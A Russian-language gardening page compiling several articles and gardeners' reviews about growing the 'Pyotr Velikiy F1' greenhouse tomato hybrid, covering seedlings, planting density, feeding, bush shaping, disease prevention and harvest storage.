3 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Томат петр великий

Характеристика томатов сорта Петр Великий

Для средней полосы страны подходят овощи, которые можно выращивать в открытом грунте и в условиях теплицы. В районе Подмосковья занимаются культивацией поздних сортов, высаживая их в поле и на участках частных хозяйств. А ранние овощи и среднеранние такие, как томат Петр Великий, нужно высаживать в закрытый грунт. В более высоких регионах их выращивают в отапливаемых теплицах, для получения ранних урожаев. В этих условиях необходимо приобретать семена индетерминантных сортов, которые плодоносят продолжительное время.

Характеристика томатов сорта Петр Великий

Характеристика сорта

Томат Петр Первый, это индетерминантный сорт, гибрид f1, первого поколения. Его характеристика включает ещё несколько пунктов.

  1. Сорт относится к средне ранним томатам, которые плодоносить начинают в возрасте 110 дней.
  2. Выращивают в теплицах средней полосы страны, а в южных регионах, можно в открытом грунте.
  3. Урожайность высокая, продукция подходит для переработки и употребления в свежем виде.

Высокий, при любых условиях выращивания, куст требует подвязки к шпалерам.

Описание куста

Описание томатов Петр Первый начнем со стеблей. Прочные стебли слегка опушены, но мало облиственны. Листья преимущественно длинные, имеющие темную зеленую окраску. Междоузлия около 15см, заканчиваются они пучком листьев, а через 4 или 5 листов формируются кисти.

Каждая кисть несет простые цветки, в количестве до 8 штук. После опыления их, может быть и 6, и 8 завязей. Каждый плод, это перцевидный помидор, заканчивающийся острым носиком. Сорт томата гибрида Петр Великий окрашивает свою продукцию в яркий красный или малиновый цвет. С одного кв.м. можно собрать около 10кг продукции.

Описание плодов

Опираясь на отзывы огородников о томате Петр Первый, мы можем сказать, что они больше всего подходят для консервирования. Плотная и упругая кожица не растрескивается под влиянием высоких температур. Но из плодов помидоров Царь Пётр можно также готовить зеленные салаты с добавлением зелени и оливкового или подсолнечного масла. Из спелых плодов получаются вкусные заготовки такие, как:

  • кетчупы;
  • соки с мякотью;
  • аджики;
  • заправки ко вторым блюдам.

Любой способ применения сохраняет полезные свойства плодов и витаминный набор.

Твердые, на ощупь, плоды способны длительно храниться. Они могут перевозиться на большие расстояния. При этом на продукции не наблюдается появление трещин, вмятин или другой деформации. Прочная кожица сохраняет целостность, поэтому плоды не повреждаются гнилью, не текут, а сохраняют красивый товарный вид.

Подготовка семян и земли

Для выращивания рассады подходят только те семена, которые приобретаются через агрофирмы. Этот сорт является гибридом первого уровня. Поэтому, если собственноручно собрать посевной материал со своих помидоров, то растения не сохранят видовые качества. Они дадут мелкие, не похожие по форме плоды, а сами кусты могут болеть и поражаться вирусами.

Перед посевом семян их можно замочить в стимуляторах роста, тогда всход их будет раньше и дружнее. Для обеззараживания замачивают в слабом, розовом растворе марганцовки. Обычно для этого хватит 7 часов, или ночного времени.

Хороший уход за рассадой повысит урожайность томатов

Готовят емкости или контейнеры с отверстиями, для выхода лишней воды. Грунт для посева берут покупной или создают сами. В его состав входят некоторые компоненты.

  1. Обязательно берется садовая земля, которая прожаривается, и этим избавляется от паразитов или вирусов.
  2. Мелкозернистый песок обеспечивает рыхлость грунта.
  3. Перепревший, в течение пару лет, навоз, удобрит грунт.
  4. Иногда для того, чтобы земля не сбивалась в комки, добавляют мелкие опилки плодовых пород деревьев.

Но при высадке томатов, на постоянное место, опилки тщательно удаляются. Они, при разложении, поглощают азот, который необходим для роста растений.

Рассада

В емкости, предназначенные для рассады, насыпают дренаж, а сверху слой подготовленного грунта. Промытые от стимуляторов, семена выкладывают на ровную поверхность земли и покрывают слоем грунта в 1см. Сбрызгивают водой и накрывают прозрачной пленкой.

Температуру внутри контейнера днем, поддерживают в районе 25гр, а ночью, возможно понижение её до 18гр. В тепле и при достаточном освещении появляются ростки на 5 или 6 день. При образовании второй пары листьев, сеянцы можно пикировать в одноразовые стаканчики. Через 2 месяца готовим рассаду к пересадке на постоянное место.

Высадка на постоянное место

В теплице, предназначенной для высадки томатов Петр Великий, размечаем дорожки и ряды будущих посадок. При этом ориентируемся, чтобы на 1 кв.м. было 3 растения, если мы намерены оставить два стебля, и 4 куста, при формировании их в один стебель. Набиваем лунки, возле которых устанавливаем прочные опоры, все лунки поливаем и высаживаем саженцы (можно лежа).

Уход за растениями

Меры по уходу достаточно просты, они под силу даже начинающим овощеводам.

  1. Смотреть, чтобы растения томатов получали достаточное освещение.
  2. При появлении сорняков, их необходимо удалять.
  3. Поливать томаты Петр Первый желательно теплой водой.
  4. Удобрять нужно химическими и органическими препаратами, но вносить их необходимо только во влажную почву.
  5. Если появились признаки болезней, заняться лечением.
  6. Уничтожать мелких насекомых и других вредителей.

Чтобы сохранить здоровой корневую систему, поливать томаты нужно только теплой водой потому, что холодная жидкость способна погубить концы корневищ. А именно они питают кусты водой и полезными веществами. Если в районе первой кисти и ниже, наблюдается большое количество листьев, то их необходимо удалять. Это делается для лучшей циркуляции воздуха и предотвращает появление серой гнили и фитофтороза. Хотя сорт и устойчив к заболеваниям, но профилактика не повредит.

Для удобрения применяют различные препараты. Но можно брать птичий помет и коровяк или сорные травы, не успевшие завязать семена. В кадушку кладут, до половины её высоты, органику и заливают водой по уровню верха. Оставляют на 14 дней для брожения. Перебродившую смесь разбавляют водой и поливают кусты, под корень.

Томат Петр Великий F1

Для гибрида вкус у «Петра Великого» на 5 баллов! Ему чуть не хватает аромата, кислинки и сочности, как «советским бабушкиным» сортам, но он и не безвкусно-пластиковый, как помидоры из импортных теплиц. Когда увидела его впервые, сразу же захотела разводить и у себя – сорт запал в душу своим внешним видом. Плоды не круглые, не овальные, а именно в форме вытянутого цилиндра с трогательным длинным носиком. Если летом получают достаточно солнца, то приобретают насыщенно-малиновый цвет и как будто светятся изнутри. За счет того, что шкурка достаточно плотная, у них хорошая лёжкость, устойчивость к транспортировке – несколько раз приходилось возить корзины с помидорами по самой жаре за 300 км, ни один не лопнул и не потёк.
Единственное неудобство – стандартные вёдра для перевозки непригодны именно из-за необычной формы томатов, пришлось купить длинные плоские корзины. В консервации фактор плотной мякоти и жёсткой толстой кожицы незаменим. Даже если солю, укладывая плотно рядами в бочку, помидоры не трескаются, внутренность не размягчается до состояния каши. Чтобы получить урожай больше, веду куст в 2 ствола, а ветви, чтобы не ломались, ставлю на опоры.

Ни разу не удалось вырастить хороший урожай этого сорта просто на грядке, все-таки наш ленинградский климат для среднеранних овощей не слишком подходящий. На кисти образовывалось всего 2-3 помидора, а не 8 обещанных. На стадии цветения многие цветочки из-за холода и влажности просто начинают гнить. Совсем другое дело в теплице, тут «Пётр Великий» развернулся во всей красе – в 1-й же год дал по 5 кг помидоров с куста, при этом, что вела его всего в 1 ствол, чтобы не перегружать кистями ветку. На следующий год обязательно поведу, как рекомендуют опытные дачники, в 2 ствола, чтобы получить больше плодов.
Особых забот сорт не требует, семена перед посевом стимуляторами роста не обрабатываю, рассада и без этого быстро проклёвывается и бойко подрастает. У взрослых кустов полив и подкормка традиционные, обрывать листья нужды нет, чтобы куст не загущался – их и так немного, совершенно не мешают сбору урожая.
Хранятся помидоры в свежем виде очень долго, особенно в тёмном прохладном и сухом месте. Последние плоды прошлогоднего урожая мы съели на 23-е февраля, и они ничуть не усохли, не стали безвкусными. Хранила даже не в ящиках с песком или опилками, а просто переложив слои старыми газетами.

Слишком жесткая кожица этого сорта – не слишком большой недостаток, просто есть сорта, которые больше подходят для консервации, а есть — для салатов. Из «Петра Великого» получаются вкуснейшая аджика и ароматное лечо, а также консервированные помидоры (целиком).
Сорт этот предназначен для выращивания в южной полосе (если выбирать открытый грунт), где климат холоднее — в теплицах. Очень красиво размещены плоды на кистях: ровно в ряд, все в размер. Кисти наполнены по всей длине.
Завязь образуется до самых морозов. Помидоров собираю очень много — по 5 кг с каждого куста. Последние, которые убираю осенью, складываю в ящик в 1 слой, и они так лежат до весны, не увядая и не портясь.

Сорт «Петр Великий» отличается формой своих плодов — цилиндрическая, с носиком. Цвет томатов красный, вес достигает от 80-ти до 120-ти грамм. Кусты вырастают большими, высокими, поэтому обязательно требуется
подвязывание. Преимущества сорта:
+ устойчивость к увяданию;
+ интересная, нестандартная форта томатов;
+ высокие вкусовые качества;
+ подходят для транспортировки и хранения, за счет плотной структуры томата.
Семена на рассаду я высаживаю за 60-65 дней, до высадки в грунт. При высадке придерживаюсь правила – на 1 кв. метр не более 3-х растений, чтобы растение могло нормально расти и развиваться.

Видео Обзор

Удачный выбор для привередливого дачника — томат «Пётр Великий» и секреты повышения его урожайности

Томат Петр Великий — гибрид, отличающийся высокой урожайностью и устойчивостью к вирусным заболеваниям, грибковым инфекциям. Культура выведена недавно, в 2015 году, но уже пользуется успехом на рынке. Из этой статьи вы узнаете все особенности выращивания томата Петр Великий и секреты хорошего урожая.

Характеристика и описание сорта

Томат Петр Великий относится к кистевым гибридам и предназначен для выращивания преимущественно в закрытом грунте. Высадка в открытый грунт возможна только в условиях мягкого климата, с небольшой разницей дневных и ночных температур.

Растение индетерминантное, отличается мощным стеблем и большой силой роста. Без прищипывания верхушки высота куста может превышать 2 м, а количество кистевых завязей на нем достигает 45 штук.

Преимущества сорта Петр Великий:

  • быстрый ответ на агротехнические манипуляции — внесение удобрений, обрезку;
  • продуктивность — при соблюдении рекомендаций по уходу урожайность достигает 10 кг на кв. м;
  • универсальное применение плодов, обладающих отличными вкусовыми характеристиками;
  • продолжительная лежкость плодов, низкие потери при транспортировке урожая.

Плоды гибрида Петр Великий отличаются вытянутой перцевидной формой с небольшим носиком. Средний размер — 10-12 см, средний вес 120 г. Кожица и мякоть спелого томата имеют ярко-красный окрас, без светлых участков и пятен. Структура мякоти плотная, не водянистая, с высоким процентом сухого вещества. Вкус насыщенный, сладковатый.

Как вырастить рассаду

Выращивание рассады гибрида происходит по стандартным правилам с учетом специфики климата. Тщательность обработки семян и почвы зависит от уровня угрозы заражения болезнями и вредителями в конкретном регионе посадки.

Подготовка семян

Учитывая, что в теплицу следует пересаживать 60-дневную рассаду, а лучшим временем для высадки станет середина мая (для средней полосы), семена для выращивания рассады лучше посеять в первой половине марта.

Гибридные семена, как правило, уже обработаны производителем. Но некоторые огородники все равно проводят дезинфекцию. Вредные микроорганизмы могут обитать на поверхности семечек и активироваться при попадании в грунт. Простейший метод обеззараживания — вымачивание в перекиси водорода (раствор 3%) в течение 20 минут.

Затем семена замачивают в воде комнатной температуры на 72 часа, обернув чистой марлей. Как правило, на третьи сутки уже проклевываются ростки — семена готовы к посадке.

Емкость и почва

Семенной материал высаживают в ящики, наполненные универсальным магазинным грунтом для томатов. На дне ящиков обязательно должны быть дренажные отверстия.

Землю можно подготовить самостоятельно, смешав в равных частях торф, песок, верхний слой огородной почвы. Рекомендуется дополнительно обработать грунт слабым раствором марганцовки и внести небольшое количество органических удобрений.

Посев

Семена углубляют в землю на 1-2 см, поливают теплой водой и создают тепличные условия, накрыв емкость с грунтом пленкой. Важно, чтобы почва в ящике не пересыхала и не охлаждалась. Оптимальный способ увлажнения в этот период — опрыскивание грунта из пульверизатора.

Дважды в сутки тепличку необходимо хорошо проветривать. При соблюдении этих условий всходы появляются на 7-10 день.

Выращивание и уход

После прорастания саженцам томатов Петр Великий необходимо обеспечить хорошее освещение, а на второй неделе — внести азотные удобрения для стимуляции роста.

Когда на растениях появляется 2-3 листка, их пикируют из общего ящика в отдельные стаканчики. Объем стаканчиков должен быть не менее 0,5 литра, чтобы подросшей рассаде было комфортно.

Как выращивать помидоры

Томаты требуют ежедневного внимания от садоводов. Выполнение рекомендаций по выращиванию помидоров гибрида Петр Великий обеспечит здоровье растениям и богатый урожай.

Посадка

Высадка томатов Петр Великий в теплицы производится в середине мая — начале июня. К этому моменту ночные температуры в парнике не должны опускаться ниже 10 °С.

Плотность посадки на 1 кв. м составляет 3 куста при последующем формировании в 2 стебля или 4 куста при формировании в 1 стебель.

Почву в теплице готовят с осени, заменяя ее верхний слой на землю с морковных грядок. Затем вносят навоз и перекапывают грунт, не разбивая комки.

Через 10 суток после посадки томатов в постоянный грунт его хорошо разрыхляют и вносят органические удобрения. Минеральные подкормки добавляют перед цветением и в период появления плодов.

Растениям требуется обильный полив теплой водой — пересыхание глубоких слоев почвы недопустимо. Еженедельно проводится рыхление почвы для полноценного кислородного обмена в корневой системе томатов.

Кусты активно растут весь период вегетации, и для вызревания плодов рекомендуется убирать пасынки, прищипывать точки роста, макушку.

Внимание! В период вызревания плодов растениям потребуется прочная опора — деревянные или пластиковые колья достаточной толщины.

Особенности выращивания и возможные трудности

При ответственном уходе томат Петр Великий комфортно чувствует себя в тепличных условиях и вступает в период плодоношения через 110-120 дней после всходов. Иногда, несмотря на соблюдение всех агротехнических нюансов, наблюдаются трудности с вызреванием плодов. Чтобы помочь растению, опытные фермеры советуют снять часть помидоров, успевших приобрести промежуточный бурый окрас.

Весь теплый сезон необходимо поддерживать оптимальный уровень влажности в теплице — это обеспечивается регулярным поливом почвы и естественным испарением влаги, но в засушливые летние дни можно установить между кустами небольшие емкости с водой.

Болезни и вредители

Гибрид Петр Великий устойчив к вирусным и грибковым инфекциям, но для профилактики рекомендуется периодически обрабатывать наземную часть растения «Фитоспорином».

При появлении насекомых-вредителей рекомендуем опрыскать кусты инсектицидным препаратом. Защиту корней обеспечит полив раствором медного купороса.

Нюансы выращивания в открытом грунте и в теплице

Томат Петр Великий, как многие среднеспелые гибриды, не предназначен для выращивания в открытом грунте. В южных регионах возможна высадка кустов вне теплиц, на грядки, но в таком случае следует позаботиться о возможности быстро прикрыть томаты пленкой от дождя или града.

Выращивание в закрытом грунте возможно по всей территории России. При этом дачники из расположенных выше средней полосы областей часто используют обогреваемые теплицы. При правильном уходе томаты плодоносят до конца сентября.

Независимо от формы посадки томатам Петр Великий требуется наличие прочной опоры, хорошее освещение (не менее 12 часов в сутки), регулярные подкормки.

Важно! Растения нужно беречь от резких температурных перепадов.

Сбор и применение урожая

Созревание первых томатов Петр Великий приходится на конец июня — июль, сбор урожая заканчивается в сентябре. За это время фермерам удается собрать до 10 кг плодов с 1 кв. м теплицы.

Сорт хорош для употребления в свежем виде и для консервации. Вкусовые качества и плотность позволяют приготовить из этих помидоров соусы, соки, томатную пасту. При консервации целых плодов прочная кожица не лопается. Сорт Петр Великий прекрасно подходит для завяливания.

Гибридные помидоры хорошо переносят транспортировку и долго хранятся, поэтому излишки урожая всегда можно выгодно продать. Бурые или зеленые плоды после сбора отправляют дозревать традиционным методом: раскладывают в деревянные ящики в 2-3 слоя, перекладывая бумагой.

Преимущества и недостатки сорта

Выращивание томатов Петр Великий не требует сложных аграрных манипуляций, и даже неопытные фермеры могут рассчитывать на хороший урожай.

Главные преимущества сорта:

  • продолжительное плодоношение;
  • устойчивость к инфекциям и грибкам;
  • приятный вкус и высокая плотность плодов.

Явных недостатков у гибридов пока не выявлено, в списке возможных неудобств:

  • большой размер кустов, склонность к быстрому разрастанию;
  • необходимость именно твердой опоры, а не просто подвязывания;
  • затрудненное выращивание в открытом грунте;
  • требуется частично разгружать растение, снимая незрелые плоды.

Некоторым огородникам свежие томаты Петр Великий кажутся жестковатыми для нарезки в салат. Но этот минус оборачивается плюсом при консервировании.

Отзывы фермеров

Сорт томатов Петр Великий был выведен сравнительно недавно и пока не получил достаточного распространения, но отзывы познакомившихся с гибридом фермеров в основном положительные.

Сергей, 48 лет, г. Новороссийск: «Высокая урожайность искупает некоторые неудобства выращивания. У меня крупной хозяйство, и хорошая лежкость гарантирует прибыль от продаж урожая».

Анна, 38 лет, г. Новгород: «Лето у нас в регионе бывает нежарким, поэтому сажаю томаты только в парнике. Петр Великий не подводил уже 3 года, но каждый год обязательно нужно заменять плодородный слой почвы в теплице».

Ирина, 42 года, г. Саратов: «В теплицу приятно зайти — помидоры выросли мощными и здоровыми. Крупные кисти зрелых томатов выглядят впечатляюще, и их фото приятно добавить в архив моих аграрных достижений».

Заключение

Томаты Петр Великий можно смело рекомендовать к выращиванию при наличии теплиц достаточного размера и соблюдении основных правил ухода (регулярный полив, рыхление, подкормки). Гибрид не слишком прихотлив и отплатит за заботу обильным урожаем.

Томат Пётр Великий F1: описание и характеристика сорта, уход и выращивание

Новинка российской селекции — томаты Пётр Великий F1 — быстро завоевали востребованность у дачников, поскольку способны в полной мере удовлетворить запросы по урожайности и вкусовым качествам плодов. Помидоры описываемого сорта отлично подходят для употребления в свежем виде, а также для изготовления консервации. В чём ещё преимущества сорта, и какие условия его выращивания, давайте разберёмся.

Характеристика и описание томатов

Пётр Великий представляет собой томатный гибрид среднераннего срока созревания индетерминантного типа, предназначенный для выращивания на открытом грунте в южных регионах и в условиях теплицы — в северных полосах государства. Описываемый сорт помидоров был выведен селекционерами России и занесён в Госреестр овощных культур в 2015 году.

Растение отличается высокой интенсивностью роста, его высота составляет около 1,8–2 м. Кусты мощные, раскидистые, нуждаются в обязательном прищипывании точки роста и подвязке. Стебли культуры немного опушены, обладают негустой облиственностью. Листья крупные, продолговатой формы, традиционного тёмно-зелёного окраса. На каждой кисти в фазе цветения формируются простые соцветия, которые, после опыления, преобразуются в завязи, а затем в плоды.

Каждый плод представляет собой ягоду продолговато-овальной формы, длиной до 12 см и весом 100–120 г. В зрелом виде плоды имеют красную или насыщенно-малиновую расцветку. Мякоть довольно плотная, сочная, с классическим помидорным вкусом. Кожица — твёрдая, гладкая, блестящая, стойкая к растрескиванию и деформациям.

Плюсы и минусы сорта

  • Гибрид обладает рядом ключевых преимуществ, которые выгодно отличают его от других сортов томатов:
  • хорошие показатели урожайности;
  • отменные эстетические и вкусовые качества плодов;
  • хорошая лёжкость, возможность транспортировки и длительного хранения томатов;
  • универсальное применение;
  • устойчивость к вертициллёзному увяданию и грибковым поражениям;
  • отличный товарный вид.
  • Среди недостатков сорта опытные овощеводы отмечают:
  • необходимость обязательной подвязки кустов;
  • некоторые нюансы в уходе.

Особенности посева и выращивания в домашних условиях

Культивирование томатов Пётр Великий начинается с выращивания качественной и сильной рассады.

Каким должен быть микроклимат

В северных регионах или средней полосе государства помидоры описываемого сорта выращивают исключительно в тепличных условиях или под плёночным укрытием. В южных регионах допускается высадка растений в открытую почву, однако показатели урожайности при этом существенно снижаются.

Технология посева

Пётр Великий относится к гибридным сортам первого типа, семена которого практически невозможно получить самостоятельно. Семенной материал рекомендуется приобретать в специализированных маркетах или агрофирмах.

Как правило, покупные семена не нуждаются в обеззараживании, поскольку производители обрабатывают их спецпрепаратами против грибков и вирусов. Однако перед посевом специалисты советуют замочить семенной материал в растворе любых стимуляторов роста или воспользоваться народными средствами — соком алоэ или мёдом.

Посев материала на рассаду проводят за 60–65 дней до предполагаемой даты высадки в грунт, приблизительно в первой декаде марта. Для выращивания ростков необходимо выбирать универсальный грунт для томатов либо приготовить почвосмесь самостоятельно, смешав в равных пропорциях торф, садовую землю и речной песок.

Собственноручно сделанную почву необходимо продезинфицировать любым удобным методом:

  • прокалить в духовке на протяжении получаса при температуре +180…+200°С;
  • заморозить на сутки в морозильной камере;
  • пролить слабым раствором перманганата калия, просушить.

Технология посева семян довольно простая и состоит из следующих этапов:

  • в подготовленные ёмкости (пластиковые ящики, кассеты, торфяные стаканчики) засыпают грунт, разравнивают;
  • в лунках глубиной 0,5–1 см располагают семена, засыпают небольшим слоем почвы;
  • поверхность грунта увлажняют тёплой водой из пульверизатора;
  • ёмкость с будущими всходами укрывают полиэтиленовой плёнкой.

Уход за посевами

Качество будущей рассады будет зависеть от особенностей ухода за ней. До появления первых всходов внутри ёмкости следует поддерживать температурные показатели на уровне +23…+25°С днём и около +18°С ночью. Обязательно нужно организовать хорошее, рассеянное освещение на протяжении 12 часов. Поливать саженцы рекомендуется по мере необходимости, не допуская чрезмерного пересыхания почвы или переувлажнения.

При поддержании комфортных условий первые ростки появятся спустя неделю. В этот период следует убрать плёночное укрытие. Когда на саженцах образуется полноценная вторая пара листьев, их можно пересаживать в отдельные ёмкости.

Спустя 2 месяца рассада готова к пересадке на постоянное место, однако за 2 недели до высадки в грунт её необходимо закалить. Для этого ростки выносят на балкон или в помещение с температурой +14…+16°С, сначала на 1–2 часа, затем ежедневно увеличивая время до полного дня. За день до посадочных работ рассаду оставляют при заданной температуре на сутки.

Сроки и технология высадки саженцев

Специалисты рекомендуют производить высадку рассады в грунт по достижении 60-дневного возраста, приблизительно во второй половине мая. Почву в теплице готовят ещё с осени: перекапывают, вносят органические удобрения — перепревший навоз в дозировке на 1 м² земли — 1 ведро органики, и суперфосфат в пропорции на 1 м² — 1 ст. л. препарата.

  • на 1 м² высаживают 3 куста помидоров при формировании растения в 2 стебля;
  • на 1 м² сажают 4 куста при формировании в 1 стебель.

После высадки рассады в грунт её обильно поливают отстоянной водой и устанавливают прочные опоры — деревянные колышки или шпалеры.

Уход за сортом помидоров

Уход за растением описываемого сорта включает ряд традиционных мероприятий, которые заключаются в хорошем поливе, качественных подкормках, своевременном пасынковании, прополке и рыхлении почвы.

Подкормки и полив

Поскольку культура характеризуется высокой интенсивностью роста, то нуждается в хороших, обильных поливах, необходимость которых определяется подсыханием верхнего слоя грунта. При проведении оросительных процедур следует ориентироваться на обильность увлажнений, а не на их частоту.

Частые, но мелкие поливы способствуют образованию мелких корневых отростков, которые не способны полноценно питать растение и насытить требуемым количеством влаги. Редкое, но обильное увлажнение способствует развитию сильной и мощной корневой системы, которая может обеспечить кусты нужными питательными веществами и влагой. Однако при проведении орошения нельзя допускать застаивания воды в почве, поскольку это приведёт к гниению корней. Для увлажнения следует применять отстоянную, нехолодную, мягкую воду.

Не менее важно организовать культуре систематические подкормки, в качестве которых разрешается использовать органику или комплексные минеральные средства. Любые удобрения нужно вносить только во влажный грунт, именно поэтому специалисты рекомендуют подкормки совмещать с поливами.

Внесение удобрений в первый раз осуществляют спустя 10 дней после высадки рассады. Для этого готовят настой птичьего помёта или коровяка и травы. Концентрированный раствор разводят водой в соотношении 1:10 и поливают кусты. Одного ведра удобрений достаточно для подкормки 10–13 кустов. Вторую порцию удобрений вносят в фазе цветения культуры, третью — в период формирования плодов. При этом применяют минеральные препараты на основе калия и фосфора. В конце лета кусты томатов опрыскивают раствором борной кислоты, из расчёта 2–3 г на 1 ведро воды.

Пасынкование и формирование куста

Формирование кустов является одной из обязательных процедур при выращивании сорта Пётр Великий. При игнорировании данного этапа получить достойный урожай качественных, крупных плодов не получится.

Формирование растения можно проводить двумя способами:

  1. В один стебель. При этом все боковые побеги удаляют, оставляя только один главный, самый сильный стебель. Обрезание боковых отростков осуществляют каждые 10 дней, после того как они достигнут длины в 5–6 см. Параллельно с этим прищипывают первую цветущую кисть, что даёт возможность снизить нагрузку на культуру и способствовать лучшей урожайности.
  2. В два стебля. При данной схеме формирования оставляют центральный стебель и самый сильный боковой отросток, на котором есть минимум 5 цветущих кистей. Остальные пасынки регулярно удаляют, каждые 7–10 дней.

Как показывает практика, лучшие результаты урожайности сорт показывает при формировании кустов в два стебля.

Рыхление почвы и прополка

1–2 раза в неделю опытные огородники советуют проводить рыхление почвы, которое позволяет:

  • насытить грунт питательными компонентами и обогатить его кислородом, тем самым активизировав рост корневой системы;
  • создать благоприятные условия для роста куста;
  • уничтожить некоторых вредителей и личинок паразитов, обитающих на корневых отростках.

Первое рыхление с углублением в 8–10 см осуществляют спустя несколько дней после высадки рассады, второе и последующие — по мере необходимости, минимум 1 раз в 7 дней.

Кроме рыхления обязательной процедурой при уходе за помидорами является прополка сорняков, наличие которых тормозит развитие куста и негативно влияет на урожайность. Прополку проводят регулярно, при первом появлении сорняков. Особенно важно уничтожить растения-паразиты до их цветения.

Чтобы предупредить появление сорняков, а также сохранить влагу в почве, специалисты рекомендуют укрыть грунт под кустами слоем мульчи — соломы, опилок, сена.

Трудности при выращивании

Несмотря на то что сорт довольно стойкий ко многим вирусным и грибковым заболеваниям, при его выращивании начинающие дачники могут столкнуться с рядом трудностей, которые, как правило, связаны с нарушением базовых правил агротехники. Чрезмерное увлажнение почвы, а также избыток удобрений могут привести к поражению фитофторозом, фузариозом, мучнистой росой. Для борьбы с данными недугами, а также для профилактики используют современные фунгицидные препараты, например, «Фитоспорин», или народные средства — бордоскую жидкость.

Против паразитов, таких как слизни, белокрылка, тля, особую эффективность оказывают инсектицидные препараты «Актофит», «Профи» или народные средства — мыльный или чесночный растворы, марганцовка, смесь из перца и горчицы.

Предупредить развитие недугов и появление вредителей помогут простые меры профилактики:

  • соблюдение севооборота;
  • своевременное рыхление почвы и уничтожение сорняков;
  • соблюдение правил полива и подкормок;
  • систематическая профобработка кустов биопрепаратами.

Стоит отметить, что сорт практически никогда не поражается возбудителем вертициллёзного увядания.

Сроки сбора и хранения плодов

Пётр Великий относится к растениям со среднеранним вегетационным периодом, уборка урожая которых начинается спустя 100–110 дней после появления ростков. Первые плоды можно собирать уже в августе, когда они достигнут фазы зрелости. Разрешается уборка помидоров в незрелом зелёном виде.

Спелые, красного окраса томаты рекомендуется сохранять в прохладном, сухом месте при температуре +10…+12°С и относительной влажности 80%. Томаты в стадии дозревания следует сохранять в тёплом помещении, где они быстро поспевают. Помидоры обладают прекрасной лёжкостью и способны сохранять свой товарный вид и полезные качества на протяжении нескольких месяцев.

Плоды характеризуются универсальностью в применении. Их широко используют в свежем виде, для приготовления салатов, закусок, кетчупов, пасты и соусов. Благодаря своей компактной форме и плотной структуре, они считаются наиболее оптимальным вариантом для консервации и приготовления различных заготовок на зиму.

Пётр Великий F1 — гибрид, который отличается превосходным товарным видом плодов, их отличной лёжкостью и высокими вкусовыми качествами. Несмотря на некоторые сложности в выращивании, касающиеся формирования куста и пасынкования, сорт довольно нетребователен в уходе и способен порадовать стабильными качественными урожаями даже начинающих огородников.

Урожайность с характеристиками и описанием сорта томата Петр Великий

К новинкам селекции можно отнести томат Петр Великий F1. Гибрид запущен в производство в 2015 году, отзывы на него найти сложно. По данным Государственного реестра, выращивать томаты Петр Великий можно в условиях закрытого грунта в любом регионе. Не обязательно иметь теплицу, гибрид можно высаживать в тоннели.

Урожайность и другие характеристики гибрида Петр Великий

При выборе нового сорта (гибрида), в первую очередь внимание обращают на характеристики:

  • срок созревания;
  • устойчивость к болезням;
  • назначение использования;
  • тип куста;
  • окраску, форму, вес и назначение спелого плода;
  • урожайность.

Сроки созревания

Растение входит в группу томатов со средними сроками созревания. У томатов, входящих в эту группу, плоды начинают спеть через 105-110 дней. Отсчет вести не со дня посева семян в грунт, а со дня появления зеленых ростков. Зная сроки созревания, определяют время посева семян на рассаду.

Сроки практически одинаковы для Урала, Средней полосы и Сибири. Сеять лучше в первой декаде марта. В середине мая можно пересаживать 60 дневную рассаду в теплицу (тоннель), а срывать первые помидоры в конце июня или в начале июля.

Кусты

Гибрид будет оптимально использовать пространство теплицы. Мощные кусты достигают 2 метровой высоты. Петр Великий по типу роста индент – индетерминантное растение, которому нужно прищипывать точку роста. Без прищипки макушки, куст будет расти до конца вегетационного периода.

Кустам нужна мощная опора. Подойдут деревянные колья старого образца или легкие колья из пластика. Высаживать рассаду можно двумя способами:

  1. На 1 м² размещать 3 куста и формировать их в 2 стебля.
  2. На 1 м² размещать 4 куста (плотная посадка), формировать в 1 стебель, удаляя все пасынки.

При соблюдении дачником рекомендованных схем, средний урожай с квадратного метра теплицы составляет 9 кг.

Плоды

Оригинальные, вытянутые, перцевидной формы, с небольшим носиком плоды небольшого размера, имеют хороший, помидорный вкус. Вес среднего плода 100-120 г, длина 12 см. Окраска кожицы и мякоти у спелого плода ярко-красная. Мякоть плотная, процент сухого вещества высокий.

Кожица прочная, защищает плоды от растрескивания во время консервации. Назначение плодов универсальное, но лучшим вариантом их использования будет изготовление томатных консервов. Плоды гибрида отлично подойдут для приготовления вяленых томатов.

Особенности ухода

С момента появления первых всходов и пересадки рассады в теплицу (тоннель), должно пройти не менее 2 месяцев. Инструкция от производителя содержит рекомендации по поводу возраста рассады. Рекомендуют пересаживать 60 дневную рассаду, она быстрее адаптируется, идет в рост и начинает плодоносить.

Растение индетерминантное, имеет большую силу роста. Для хорошего плодоношения ему нужно создать определенные условия:

  • заправленная органикой и минеральными удобрениями гряда;
  • соблюдение рекомендованной плотности посадки;
  • наличие прочной опоры;
  • поливы;
  • подкормки корневые и внекорневые;
  • удаление пасынков и листьев;
  • частичный сбор бурых плодов, не достигших спелости;
  • регулярный контроль над влажностью воздуха в теплице.

Почву в теплице подготовить осенью. Стоит снять верхний слой толщиной в 5 см и вынести на огород. Гряду заправить свежей огородной землей, взятой с гряды, где росла морковь или лук. Добавить перепревший навоз из расчета 1 ведро на квадратный метр.

Суперфосфат внести осенью, по столовой ложке на квадратный метр. Гряду перекопать, не разбивая комья. Зимой забросать ее толстым слоем снега. Весной разбросать по поверхности аммиачную селитру (1 ст. л/м²), землю перекопать, разровнять граблями, наметить лунки. В конце апреля или в мае пересадить рассаду.

Подкормки

Первую подкормку в теплице провести через 10 дней. Для нее приготовить настой коровяка или травы. Концентрированный раствор развести с водой в пропорции 1:10. Одного ведра должно хватить на 10-15 кустов. В ведро с настоем можно добавить столовую ложку суперфосфата.

Вторую и третью подкормку провести комплексными удобрениями для томатов. Вторую во время цветения, третью в период массового формирования плодов. В августе опрыскать кусты раствором борной кислоты (2-3 г на ведро).

Болезни и вредители

Современные гибриды обладают повышенным иммунитетом к грибным и вирусным инфекциям. Петр Великий не является исключением. Здоровая рассада и хороший уход за помидорами в теплице, гарантируют отсутствие у сорта болезней. Особую устойчивость отмечают по отношению к возбудителям вертициллезного увядания.

На форумах о томате Петр Великий

Оксана, г. Саратов

Два года назад построили теплицу. Первыми из помидор посадила рассаду Петра Великого. Садила не прямо, а под небольшим углом. Описание от «Седек» брала за основу. При выращивании, кусты формировала в 2 стебля, лишние пасынки удаляла. Для салатов плоды слишком плотные, все пустила на заготовки. В маринованном виде перцевидные томаты хороши и на вкус, и на вид. Нынче снова посадила 5 кустов, но кусты запустила – пасынки вовремя не выломала. Помидор на заготовки хватило, плоды завязывались до конца августа.

Заключение

